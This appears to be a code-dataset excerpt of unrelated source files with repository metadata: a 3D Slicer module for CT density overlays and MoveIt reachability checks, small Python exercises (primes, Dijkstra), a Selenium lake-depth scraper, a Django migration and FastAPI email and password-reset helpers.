densityColor.SetColor(newColorSize - 1, 0.35, 0.35, 0.35)
else:
densityColor.SetColor(newColorSize - 1, 0.875, 0.671875, 0.41015625)
modelDisplayNode.SetAndObserveColorNodeID(densityColor.GetID())
print("Displaying...")
modelDisplayNode.SetScalarVisibility(True)
modelDisplayNode.SetScalarRangeFlag(0)
modelDisplayNode.SetScalarRange((scalarRange[0], scalarRange[1]))
def addOverlay(self, outputModel, targetNode):
targetNode.GetMarkupPoint(0, 0, self.targetGlobal)
self.targetPoint = self.transformToCT(self.targetGlobal)
logging.info("Surface point in CT indices: {}".format(self.targetPoint))
npArrPoly = arrayFromModelPoints(outputModel)
if self.waypoint(25, "Adding scalar overlay"):
return None
self.scalarData = vtk.vtkFloatArray()
self.scalarData.SetNumberOfComponents(0)
self.scalarData.SetNumberOfValues(len(npArrPoly))
self.scalarData.SetName("density")
# Calc density for all relevant surface points
point_VolumeRas = vtk.vtkPoints()
transformed = self.transformPointsToCT(outputModel.GetPolyData().GetPoints(), point_VolumeRas)
distances = np.linalg.norm(npArrPoly - self.targetGlobal, axis=1)
pointOutside = np.add(np.add(distances > self.maxDistance, ~self.pointInVolume(transformed, self.arrShape)),
npArrPoly[:, 1] < 50 + np.min(npArrPoly[:, 1]))
pointInside = ~pointOutside
np.asarray(self.scalarData)[pointOutside] = self.globalMaxDensity
indices = list(compress(range(len(pointInside)), pointInside))
insideTransformed = np.asarray(list(compress(transformed, pointInside)))
self.maxIdx = len(indices) - 1
logging.info(self.maxIdx)
with np.errstate(divide='ignore', invalid='ignore'):
if self.overlayTypeIndex == 7:
start_B = time.time()
self.overlayTypeIndex = 0
if not calcDensityInThread(self, indices, insideTransformed):
return None
if self.waypoint(40):
return None
combinedData = np.copy(self.scalarData)
relevant_indices = np.logical_and(combinedData < self.colorbarValue, pointInside)
end_B = time.time()
self.T1 = end_B - start_B
if self.distanceWeighting > 0:
self.overlayTypeIndex = 4 # Distance
start_C = time.time()
if not calcDensityInThread(self, indices, insideTransformed):
return None
if self.waypoint(60):
return None
maxDistance = self.maxDistance
np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
relevant_indices] / maxDistance * self.colorbarValue
combinedData[relevant_indices] = self.distanceWeighting * np.asarray(self.scalarData)[
relevant_indices]
end_C = time.time()
self.T2 = end_C - start_C
else:
combinedData[relevant_indices] = 0
if self.angleWeighting > 0:
start_D = time.time()
self.overlayTypeIndex = 5 # Angle
if not calcDensityInThread(self, indices, insideTransformed):
return None
maxAngle = np.pi / 2
np.asarray(self.scalarData)[relevant_indices] = np.asarray(self.scalarData)[
relevant_indices] / maxAngle * self.colorbarValue
combinedData[relevant_indices] = combinedData[relevant_indices] + self.angleWeighting * \
np.asarray(self.scalarData)[relevant_indices]
end_D = time.time()
self.T3 = end_D - start_D
np.asarray(self.scalarData)[:] = combinedData
self.overlayTypeIndex = 7
else:
if not calcDensityInThread(self, indices, insideTransformed):
return None
return indices, insideTransformed
def initWithPreviousModel(self, inputVolume, outputModel):
if self.arrShape is None:
self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
self.transformRasToVolumeRas)
# Get voxel coordinates from physical coordinates
volumeRasToIjk = vtk.vtkMatrix4x4()
inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
self.volumeRasToIjk = vtk.vtkTransform()
self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
self.globalMinDensity = np.min(self.inputVolumeNPArray)
self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
self.spacing = inputVolume.GetSpacing()
logging.info("Shape: " + str(self.arrShape))
self.result = np.zeros(self.arrShape) + self.globalMaxDensity
outputModel.GetPolyData().GetPointData().RemoveArray("density")
def segmentSkin(self, inputVolume, outputModel):
# If volume node is transformed, apply that transform to get volume's RAS coordinates
self.transformRasToVolumeRas = vtk.vtkGeneralTransform()
slicer.vtkMRMLTransformNode.GetTransformBetweenNodes(None, inputVolume.GetParentTransformNode(),
self.transformRasToVolumeRas)
# Get voxel coordinates from physical coordinates
volumeRasToIjk = vtk.vtkMatrix4x4()
inputVolume.GetRASToIJKMatrix(volumeRasToIjk)
self.spacing = inputVolume.GetSpacing()
self.volumeRasToIjk = vtk.vtkTransform()
self.volumeRasToIjk.SetMatrix(volumeRasToIjk)
self.inputVolumeNPArray = np.asarray(slicer.util.arrayFromVolume(inputVolume))
self.globalMaxDensity = np.max(self.inputVolumeNPArray) + 10
self.globalMinDensity = np.min(self.inputVolumeNPArray)
self.arrShape = np.asarray(np.shape(self.inputVolumeNPArray))
logging.info("Shape: " + str(self.arrShape))
self.result = np.zeros(self.arrShape) + self.globalMaxDensity
if self.waypoint(5, "Creating segmentation"):
return False
# Create segmentation
if self.segmentationNode is not None:
slicer.mrmlScene.RemoveNode(self.segmentationNode)
addedSegmentID, segmentEditorWidget, segmentEditorNode = self.initSegmentationNode(inputVolume)
self.applyThresholding(segmentEditorWidget, inputVolume)
if self.waypoint(10, "Selecting largest island"):
return False
self.applyLargestIsland(segmentEditorWidget)
if self.useHoleFilling:
if self.waypoint(12, "Filling holes"):
return False
self.applySmoothing(segmentEditorWidget)
if self.waypoint(18, "Inverting"):
return False
self.applyInverting(segmentEditorWidget)
if self.waypoint(19, "Selecting largest island"):
return False
# Selecting largest island
self.applyLargestIsland(segmentEditorWidget)
if self.waypoint(20, "Inverting"):
return False
self.applyInverting(segmentEditorWidget)
# Cleanup
segmentEditorWidget.setActiveEffectByName(None)
slicer.mrmlScene.RemoveNode(segmentEditorNode)
if self.waypoint(21, "Creating closed surface"):
return False
outputPolyData = vtk.vtkPolyData()
slicer.vtkSlicerSegmentationsModuleLogic.GetSegmentClosedSurfaceRepresentation(self.segmentationNode,
addedSegmentID, outputPolyData)
outputModel.SetAndObservePolyData(outputPolyData)
self.segmentationNode.GetDisplayNode().SetVisibility(False)
def checkMoveIt(self, modelPoints):
# Split Array
positions = modelPoints[:, :3]
color = modelPoints[:, 3]
# Only eval Points which have a feasible color
relevantColor = color < self.globalMaxDensity
positions_color = positions[relevantColor, :]
# Round Positions
positions_color_r = np.ceil(positions_color / self.discreetStepsValue) * self.discreetStepsValue
# Find unique Positions
positions_color_r_unique = np.unique(positions_color_r, axis=0)
transformedPoints = self.transformToBase(
np.append(np.expand_dims(self.targetGlobal, axis=0), positions_color_r_unique, axis=0))
sendArray = np.append(np.array([len(positions_color_r_unique)]), transformedPoints.flatten())
target_transformed = transformedPoints[0, :3]
self.waypoint(96, 'Starting Checking Points with MoveIt')
# print(sendArray)
print('Points to evaluate:' + str(len(positions_color_r_unique)))
# Convert to Float
moveIt_result = self.sendInPeices(positions_color_r_unique, sendArray, target_transformed)
# print("moveIt_result_boolean", moveIt_result)
moveIt_result_idx = np.ones(len(moveIt_result))
if np.any(np.asarray(moveIt_result)):
moveIt_result_idx[np.asarray(moveIt_result)] = 2
# 0 --> not in map, 1--> in colormap but not reachabel, 2--> in colormap and reachable
self.waypoint(99, 'Finished Checking Points with MoveIt')
# Update Color List
color_array_moveIT = np.zeros(len(positions_color_r))
for count, p in enumerate(positions_color_r_unique):
color_array_moveIT[np.all(positions_color_r == p, axis=1)] = moveIt_result_idx[count]
modelPointsOut = np.zeros((len(positions), 5), dtype=np.float)
modelPointsOut[:, :3] = positions
modelPointsOut[:, 3] = color
modelPointsOut[relevantColor, 4] = color_array_moveIT
return modelPointsOut
def sendInPeices(self, positions_color_r_unique, sendArray, target_transformed):
sent = 0
socketsForSimulation = self.socketReceiveSend if len(self.socketReceiveSend) <= 1 else self.socketReceiveSend[1:]
per_package = int(np.ceil(len(positions_color_r_unique) / len(socketsForSimulation)))
for s in socketsForSimulation:
if len(positions_color_r_unique) <= sent:
break
up_idx = min(sent + per_package, len(positions_color_r_unique))
to_send = np.append(np.asarray((up_idx - sent)), target_transformed[:3])
to_send = np.append(to_send, sendArray[(4 + sent * 3):(up_idx * 3 + 4)])
sent = up_idx
s.send(str(to_send.tolist()).encode())
# Receive Answer
moveIt_result = []
sent = 0
for s in socketsForSimulation:
if len(positions_color_r_unique) <= sent:
break
up_idx = min(sent + per_package, len(positions_color_r_unique))
sent = up_idx
recv_data = s.recv(102400)
msg = list(recv_data.decode('utf-8'))
moveIt_result += [bool(int(i)) for i in msg]
return moveIt_result
def applyMaxKernel(self, indices, pointsTransformed):
if self.maxKernelSize == 0:
return True
self.waypoint(75., "Applying max kernel")
from sklearn.neighbors import radius_neighbors_graph
values = np.copy(self.scalarData)
values = values[indices]
neighbours = radius_neighbors_graph(pointsTransformed * self.spacing, radius=self.maxKernelSize, n_jobs=-1,
include_self=True)
executeInPeices(lambda q, idx, sent: self.applyMaxKernelImpl(q, idx, neighbours, values, sent), indices, np.asarray(self.scalarData))
if self.waypoint(95.):
return False
return True
@staticmethod
def applyMaxKernelImpl(q: Queue, indices, neighbours, values, idxOffset):
result = np.zeros((len(indices)))
for neighbourIdx, idx in enumerate(indices):
finalIdx = np.asarray(neighbours.getrow(neighbourIdx + idxOffset).toarray(), dtype=np.bool).flatten()
result[neighbourIdx] = np.max(values[finalIdx])
q.put(result)
def pointInVolume(self, point, maxDim):
return np.logical_and(np.all(point > 0, axis=1), np.all(point < maxDim - 1, axis=1))
def transformToCT(self, point):
point_VolumeRas = self.transformRasToVolumeRas.TransformPoint(point[0:3])
point_Ijk = self.volumeRasToIjk.TransformPoint(point_VolumeRas)
return np.asarray(np.flip(point_Ijk[0:3], 0), dtype=np.int)
def transformPointsToCT(self, points, point_VolumeRas):
tmp = vtk.vtkPoints()
self.transformRasToVolumeRas.TransformPoints(points, tmp)
self.volumeRasToIjk.TransformPoints(tmp, point_VolumeRas)
return np.asarray(np.flip(vtk.util.numpy_support.vtk_to_numpy(point_VolumeRas.GetData())[:, 0:3], 1),
dtype=np.int)
def applyGantryMesh(self, tf_matrix: np.ndarray):
IJK_T_RAS = np.eye(4)
transformed_pose = tf_matrix.dot(IJK_T_RAS).dot(self.gantry_pose)
size = 3000.
points = np.asarray(((0., 0., 0., 1.), (0., size, 0., 1.), (size, 0., 0., 1.), (size, 0., 0., 1.),
(0., size, 0., 1.), (size, size, 0., 1.))).T
points = transformed_pose.dot(points)[:3, :]
max_v = np.max(points, axis=1)
min_v = np.min(points, axis=1)
center = (max_v - min_v) / 2 + min_v
points = np.subtract(points.T, center)
sendArray = np.append(np.append(np.asarray((-2., 1.)), center), points.flatten())
for s in self.socketReceiveSend:
s.send(str(sendArray.tolist()).encode())
# Wait for bb to be applied
for s in self.socketReceiveSend:
s.recv(102400)
def transformPoints(self, points, matrix):
transformed = matrix.dot(np.append(points, np.ones((np.shape(points)[0], 1)), axis=1).T)
return transformed[:3, :].T
def transformToBase(self, points):
tf_mat = self.np_matrix_from_vtk(self.matrix)
IJK_T_RAS = np.eye(4)
IJK_T_RAS[0, 0] = -1
IJK_T_RAS[1, 1] = -1
tf_mat = tf_mat.dot(IJK_T_RAS)
return self.transformPoints(points, tf_mat)
def applyCollisionMesh(self, points: np.ndarray):
resolution = 30.
# Round Positions
positions_to_eval_subsampled = np.round(points / resolution) * resolution
# Find unique Positions
unique_points_eval = np.unique(positions_to_eval_subsampled, axis=0)
if len(unique_points_eval) == 0:
return
points_arr = self.transformToBase(unique_points_eval)
cloud = pv.PolyData(points_arr[:, :3])
# cloud.plot()
volume = cloud.delaunay_3d(alpha=resolution * 1.2)
shell = volume.extract_geometry()
# shell.plot()
# Hull
# hull = ConvexHull(points_arr[:, :3])
indices = shell.faces.reshape((-1, 4))[:, 1:]
vertices = points_arr[indices]
# add table
max_v = np.max(np.max(vertices, axis=0), axis=0)
min_v = np.min(np.min(vertices, axis=0), axis=0)
table_slack = 30.
depth = 500.
min_v[2] += table_slack
min_v[:2] -= table_slack
max_v[:2] += table_slack
table = np.asarray(
(((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2] - depth), (min_v[0], max_v[1], min_v[2] - depth),
(max_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2] - depth), (max_v[0], max_v[1], min_v[2] - depth),
(max_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2]), (min_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2] - depth), (min_v[0], min_v[1], min_v[2] - depth),
(min_v[0], min_v[1], min_v[2])),
((max_v[0], min_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
((max_v[0], max_v[1], min_v[2] - depth), (max_v[0], min_v[1], min_v[2] - depth),
(max_v[0], min_v[1], min_v[2])),
((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], min_v[1], min_v[2]), (max_v[0], min_v[1], min_v[2] - depth),
(min_v[0], min_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth)),
((min_v[0], max_v[1], min_v[2]), (max_v[0], max_v[1], min_v[2] - depth),
(min_v[0], max_v[1], min_v[2] - depth))))
vertices = np.append(table, vertices, axis=0)
max_v = np.max(np.max(vertices, axis=0), axis=0)
min_v = np.min(np.min(vertices, axis=0), axis=0)
center = (max_v - min_v) / 2 + min_v
vertices -= center
# Convert to Float
sendArray = np.append(np.append(np.asarray((-2., 0.)), center), np.ndarray.flatten(vertices))
for s in self.socketReceiveSend:
s.send(str(sendArray.tolist()).encode())
# Wait for bb to be applied
for s in self.socketReceiveSend:
s.recv(102400)
@staticmethod
def isValidInputOutputData(inputVolumeNode, outputModel, targetNode):
"""Validates if the output is not the same as input
"""
if not inputVolumeNode:
logging.debug('isValidInputOutputData failed: no input volume node defined')
return False
if not outputModel:
logging.debug('isValidInputOutputData failed: no output volume node defined')
return False
if not targetNode:
logging.debug('isValidInputOutputData failed: no target node defined')
return False
return True
def waypoint(self, percentageDone=None, log=None):
if log:
logging.info(log)
if self.updateCallback:
self.updateCallback(percentageDone)
if self.cancel:
self.cancel = False
return True
return False
def cleanUp(self):
if self.segmentationNode is not None:
slicer.mrmlScene.RemoveNode(self.segmentationNode)
def initSegmentationNode(self, inputVolume):
self.segmentationNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentationNode")
self.segmentationNode.SetReferenceImageGeometryParameterFromVolumeNode(inputVolume)
addedSegmentID = self.segmentationNode.GetSegmentation().AddEmptySegment("skin")
segmentEditorWidget = slicer.qMRMLSegmentEditorWidget()
segmentEditorWidget.setMRMLScene(slicer.mrmlScene)
segmentEditorNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLSegmentEditorNode")
segmentEditorWidget.setMRMLSegmentEditorNode(segmentEditorNode)
segmentEditorWidget.setSegmentationNode(self.segmentationNode)
segmentEditorWidget.setMasterVolumeNode(inputVolume)
return addedSegmentID, segmentEditorWidget, segmentEditorNode
def applyThresholding(self, segmentEditorWidget, inputVolume):
rangeHU = inputVolume.GetImageData().GetScalarRange()
# Thresholding
segmentEditorWidget.setActiveEffectByName("Threshold")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("MinimumThreshold", self.imageThreshold)
effect.setParameter("MaximumThreshold", rangeHU[1])
effect.self().onApply()
def applyLargestIsland(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Islands")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("Operation", "KEEP_LARGEST_ISLAND")
effect.setParameter("MinimumSize", 1000)
effect.self().onApply()
def applySmoothing(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Smoothing")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("SmoothingMethod", "CLOSING")
effect.setParameter("KernelSizeMm", 10)
effect.self().onApply()
def applyInverting(self, segmentEditorWidget):
segmentEditorWidget.setActiveEffectByName("Logical operators")
effect = segmentEditorWidget.activeEffect()
effect.setParameter("Operation", "INVERT")
effect.self().onApply()
def calcDensityInThread(logic: BestPathVisualizationLogic, indices: list, insideTransformed: np.ndarray):
indices_per_process = int(np.ceil(len(indices) / cpu_count()))
sent = 0
processes = []
original_stdin = sys.stdin
sys.stdin = open(os.devnull)
try:
for _ in range(cpu_count()):
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
q = Queue()
p = Process(target=calcDensityImpl, args=(
q, logic.targetPoint, logic.arrShape, insideTransformed[sent:local_sent, :], indices[sent:local_sent],
logic.imageThreshold, logic.globalMaxDensity, logic.inputVolumeNPArray, logic.overlayTypeIndex,
logic.spacing))
sent = local_sent
p.start()
processes.append((q, p))
sent = 0
for q, p in processes:
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
np.asarray(logic.scalarData)[indices[sent:local_sent]] = q.get()
p.join()
sent = local_sent
finally:
sys.stdin.close()
sys.stdin = original_stdin
return True
def calcDensityImpl(q: Queue, targetPoint: np.ndarray, arrShape: np.ndarray, insideTransformed: np.ndarray,
indices: list, imageThreshold: float,
globalMaxDensity: float, inputVolumeNPArray: np.ndarray, overlayTypeIndex: int,
spacing: np.ndarray):
densities = np.zeros((len(indices)))
for dispIdx in range(len(indices)):
densities[dispIdx] = overlay.calcDensity(targetPoint, arrShape, insideTransformed[dispIdx], indices[dispIdx],
imageThreshold, globalMaxDensity, inputVolumeNPArray, overlayTypeIndex,
spacing)
q.put(densities)
def executeInPeices(function, indices, outArray):
indices_per_process = int(np.ceil(len(indices) / cpu_count()))
sent = 0
processes = []
original_stdin = sys.stdin
sys.stdin = open(os.devnull)
try:
for _ in range(cpu_count()):
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
q = Queue()
p = Process(target=function,
args=(q, indices[sent:local_sent], sent))
sent = local_sent
p.start()
processes.append((q, p))
sent = 0
for q, p in processes:
if sent >= len(indices):
break
local_sent = min(sent + indices_per_process, len(indices))
outArray[indices[sent:local_sent]] = q.get()
p.join()
sent = local_sent
finally:
sys.stdin.close()
sys.stdin = original_stdin
|
[
"stefan.gerlach@tuhh.de"
] |
stefan.gerlach@tuhh.de
|
16646a3eed6770bf209dba69949d33c6bcd46b9e
|
f71601a72f5fe57b8e21f71093dde06bf30d609d
|
/coding_solutions/Day16(3-06-2020)/PrimeInterval.py
|
18446d9453565051fb5e83b99cd3d6c22745d631
|
[] |
no_license
|
alvas-education-foundation/Dhanya-bhat
|
eb812fdd6ae28bf45d9db3d1f691f0abc2ef926e
|
aadf27ca7ed0832e215db1938201bb3896df327b
|
refs/heads/master
| 2022-12-02T07:59:01.386373
| 2020-08-10T13:11:50
| 2020-08-10T13:11:50
| 265,844,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
l = int(input("Enter start point: "))
u = int(input("Enter end point: "))
for num in range(l,u + 1):
if num > 1:
for i in range(2,num):
if (num % i) == 0:
break
else:
print(num)
|
[
"dhanyabhat29@gmail.com"
] |
dhanyabhat29@gmail.com
|
505d970dbb3fbfed63db57de304445fbdbfe37c9
|
5d24987bce37f5e5ae60a4f550d0b5723ebe7718
|
/Preparing data/odata_download.py
|
1dd62c7c0425686f3392f16d70f405b6a10739ee
|
[] |
no_license
|
saraheikonen/eutrophication-drivers
|
53e3c8138e4663cd0df1a54a47ee1a6b759ec652
|
fadc7e08252ff9d144aea768c7f4a1153e479762
|
refs/heads/main
| 2023-04-14T09:10:13.728341
| 2022-07-13T11:21:06
| 2022-07-13T11:21:06
| 504,433,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,255
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 18 13:11:46 2021
@author: sarah
"""
from selenium import webdriver
from selenium.webdriver.support.ui import Select
import geopandas as gpd
import numpy as np
import os
# give paths to catchment shapefile (basins_path), to chromedriver.exe and where
# to save catchments with depth
basins_path = 'Y:/Dippa/Data/model_input/basins/lake_catchments'
chromedriver_path = chromedriver_path = 'Y:/Dippa/Koodi local/Download data/chromedriver'
save_path = 'Y:/Dippa/Data/basins/lake_catchments_with_depth'
# if save path doesn't exist, create folder
if not os.path.exists(save_path):
os.makedirs(save_path)
def build_query(short_id, driver):
# open jarvirajapinta querybuilder
jarviapi_url = 'http://rajapinnat.ymparisto.fi/api/jarvirajapinta/1.0/ODataQueryBuilder/'
driver.get(jarviapi_url)
# select top 1 result from dropdown
element_top= Select(driver.find_element_by_id('top'))
element_top.select_by_value('1')
driver.implicitly_wait(5)
# select jarvi from dropdown menu
element_jarvi = Select(driver.find_element_by_id('entities'))
element_jarvi.select_by_value('0')
driver.implicitly_wait(5)
# add where-condition: short lake id
#driver.implicitly_wait(5)
driver.find_element_by_id('addCondition').click()
element_condition = Select(driver.find_element_by_class_name('property'))
element_condition.select_by_value('1')
driver.implicitly_wait(5)
# equals
element_equals = Select(driver.find_element_by_class_name('propertyFilter'))
element_equals.select_by_value('0')
driver.implicitly_wait(5)
# short id
driver.find_element_by_class_name('propertyFilterInput').send_keys(short_id)
#select columns: mean depth in meters
driver.find_element_by_id('addSelectCondition').click()
short_id = driver.find_element_by_id('selectcolumn_24')
short_id.click()
driver.implicitly_wait(5)
# search
search_button = driver.find_element_by_id('submitQuery')
search_button.click()
# get result
driver.implicitly_wait(5)
mean_depth = driver.find_element_by_xpath('/html/body/div/div[2]/table/tbody/tr/td').text
if len(mean_depth) > 0:
depth_value = float(mean_depth)
else:
depth_value = np.nan
# refresh page to start over
search_button = driver.find_element_by_id('clearQuery')
search_button.click()
return depth_value
def main(basins_path, chromedriver_path, save_path):
# prepare basins df
basins = gpd.read_file(basins_path)
# make a new field for shortened VPDTunnus
basins['VPDLyh'] = basins.apply(lambda x: x.VPDTunnus.split('_')[0], axis = 1)
# set up chromedriver
driver = webdriver.Chrome(executable_path=chromedriver_path)
# call guery function on actual df
basins.insert(5, 'mean_depth', np.nan)
basins.loc[:,'mean_depth'] = basins.apply(lambda x: build_query(x.VPDLyh, driver), axis = 1)
driver.close()
basins.to_file(save_path + '/basins_with_lake_depth.shp')
main(basins_path, chromedriver_path, save_path)
|
[
"noreply@github.com"
] |
noreply@github.com
|
f59676ae9eac334e4b46372346f1f0b0d5844c4e
|
c60c199410289c1d7ec4aea00833b461e1f08f88
|
/27-29-nov-2014/day1/stringiter2.py
|
027138065a5897ed5823bf0d6c686f23c0a0f2de
|
[] |
no_license
|
ver007/pythonjumpstart
|
66fb111e6af197fad3e853b2c2d712a1b57a7d59
|
5b1f52479abd07456e2da494149e491d398f3b7d
|
refs/heads/master
| 2021-01-21T01:34:35.501870
| 2015-05-13T14:10:13
| 2015-05-13T14:10:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
__author__ = 'ravi'
s = 'aeiou'
i = 1
for char in s:
print "{}".format(char*i)
i += 1
|
[
"ravi@rootcap.in"
] |
ravi@rootcap.in
|
a8ac5edd27c7ac2656e13272e14dc4959808b147
|
d4f7457a15472788821c31f3ffbbefc620e7984d
|
/student/migrations/0013_alter_project_upload_images.py
|
04373a559a4e521a42d067291e21dee28c0666b7
|
[] |
no_license
|
shashiprajj/Resume_master
|
9d3a48650d66b0912742676ada41810274f2b8e3
|
3acc94b0bb5dd140ea1ecc2fba2550ef71a556ef
|
refs/heads/master
| 2023-07-02T15:14:18.578101
| 2021-08-07T20:21:21
| 2021-08-07T20:21:21
| 393,724,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
# Generated by Django 3.2.3 on 2021-05-30 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('student', '0012_alter_project_upload_images'),
]
operations = [
migrations.AlterField(
model_name='project',
name='upload_images',
field=models.FileField(blank=True, null=True, upload_to='projects'),
),
]
|
[
"shashiprajj@gmail.com"
] |
shashiprajj@gmail.com
|
f9c5db59cf745e342ac21e9f1ee948e6452c7beb
|
c523eff326b8bc6c0c903bf7fe16ec3b98605bff
|
/choieungi/boj/다익스트라_우선순위큐.py
|
24bc8f468ea051c8473f4f4dbe8747fbce8c0e78
|
[] |
no_license
|
IgoAlgo/Problem-Solving
|
c76fc157c4dd2afeeb72a7e4a1833b730a0b441d
|
5cc57d532b2887cf4eec8591dafc5ef611c3c409
|
refs/heads/master
| 2023-06-26T05:12:02.449706
| 2021-07-14T06:57:00
| 2021-07-14T06:57:00
| 328,959,557
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,856
|
py
|
import heapq
import sys
input = sys.stdin.readline
INF = int(1e9) # 무한을 의미하는 값으로 10억을 설정
# 노드의 개수, 간선의 개수를 입력받기
n, m = map(int, input().split())
# 시작 노드 번호를 입력받기
start = int(input())
# 각 노드에 연결되어 있는 노드에 대한 정보를 담는 리스트를 만들기
graph = [[] for i in range(n + 1)]
# 최단 거리 테이블을 모두 무한으로 초기화
distance = [INF] * (n + 1)
# 모든 간선 정보를 입력받기
for _ in range(m):
a, b, c = map(int, input().split())
# a번 노드에서 b번 노드로 가는 비용이 c라는 의미
graph[a].append((b, c))
def dijkstra(start):
q = []
# 시작 노드로 가기 위한 최단 경로는 0으로 설정하여, 큐에 삽입
heapq.heappush(q, (0, start))
distance[start] = 0
while q: # 큐가 비어있지 않다면
# 가장 최단 거리가 짧은 노드에 대한 정보 꺼내기
dist, now = heapq.heappop(q)
# 현재 노드가 이미 처리된 적이 있는 노드라면 무시
if distance[now] < dist:
continue
# 현재 노드와 연결된 다른 인접한 노드들을 확인
for i in graph[now]:
cost = dist + i[1]
# 현재 노드를 거쳐서, 다른 노드로 이동하는 거리가 더 짧은 경우
if cost < distance[i[0]]:
distance[i[0]] = cost
heapq.heappush(q, (cost, i[0]))
# 다익스트라 알고리즘을 수행
dijkstra(start)
# 모든 노드로 가기 위한 최단 거리를 출력
for i in range(1, n + 1):
# 도달할 수 없는 경우, 무한(INFINITY)이라고 출력
if distance[i] == INF:
print("INFINITY")
# 도달할 수 있는 경우 거리를 출력
else:
print(distance[i])
|
[
"choieungi@gm.gist.ac.kr"
] |
choieungi@gm.gist.ac.kr
|
18d4a948b0ca382c4d01997d274c1deb0cbccddf
|
b92226895d04b0258981864e8604720de9c09f4d
|
/src/utils.py
|
3200a377f749da6ea1b234e191737060009fa795
|
[
"BSD-3-Clause"
] |
permissive
|
aydinmemis/blog_FastAPI
|
e42a6c4f5a9c64154da0f9a23290c274b305838a
|
f584634a2cd410904df6a7d9478044d269737a91
|
refs/heads/master
| 2022-04-06T12:37:59.068303
| 2020-03-11T18:04:14
| 2020-03-11T18:04:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,688
|
py
|
import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment={}):
assert config.EMAILS_ENABLED, "no provided configuration for email variables"
message = emails.Message(
subject=JinjaTemplate(subject_template),
html=JinjaTemplate(html_template),
mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
)
smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
if config.SMTP_TLS:
smtp_options["tls"] = True
if config.SMTP_USER:
smtp_options["user"] = config.SMTP_USER
if config.SMTP_PASSWORD:
smtp_options["password"] = config.SMTP_PASSWORD
response = message.send(to=email_to, render=environment, smtp=smtp_options)
logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Test email"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html") as f:
template_str = f.read()
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={"project_name": config.PROJECT_NAME, "email": email_to},
)
def send_reset_password_email(email_to: str, email: str, token: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Password recovery for user {email}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
template_str = f.read()
if hasattr(token, "decode"):
use_token = token.decode()
else:
use_token = token
server_host = config.SERVER_HOST
link = f"{server_host}/reset-password?token={use_token}"
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": email,
"email": email_to,
"valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
"link": link,
},
)
def send_new_account_email(email_to: str, username: str, password: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - New account for user {username}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
template_str = f.read()
link = config.SERVER_HOST
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": username,
"password": password,
"email": email_to,
"link": link,
},
)
def generate_password_reset_token(email):
delta = timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
now = datetime.utcnow()
expires = now + delta
exp = expires.timestamp()
encoded_jwt = jwt.encode(
{"exp": exp, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
config.SECRET_KEY,
algorithm="HS256",
)
return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
try:
decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
assert decoded_token["sub"] == password_reset_jwt_subject
